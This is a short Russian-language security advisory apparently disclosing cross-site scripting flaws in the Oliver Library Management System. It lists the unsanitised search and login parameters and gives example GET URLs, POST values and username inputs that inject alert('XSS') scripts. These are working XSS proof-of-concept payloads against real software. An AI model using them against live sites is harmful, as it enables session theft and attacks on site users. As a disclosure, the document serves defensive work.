Программа: Oliver Library Management System

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за недостаточной обработки входных данных в множественных параметрах (например, «database», «SuggestedSearch», «searchform», «username», и reportedly others) при выполнении поиска или входе в систему. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

GET параметры в форме поиска:

http://www.victim.com/oliver/gateway/gateway.exe?X_=000f&application=
Oliver&displayform=main&updateform=»><script>alert(«XSS»);</script>
http://www.victim.com/oliver/gateway/gateway.exe?X_=000f&displayform =main"><script>alert(«XSS»);</script>

POST параметры в форме поиска:

«><script>alert(«xss»);</script>

Поле Username login:

—><script>alert(«xss»)</script>



Оставить мнение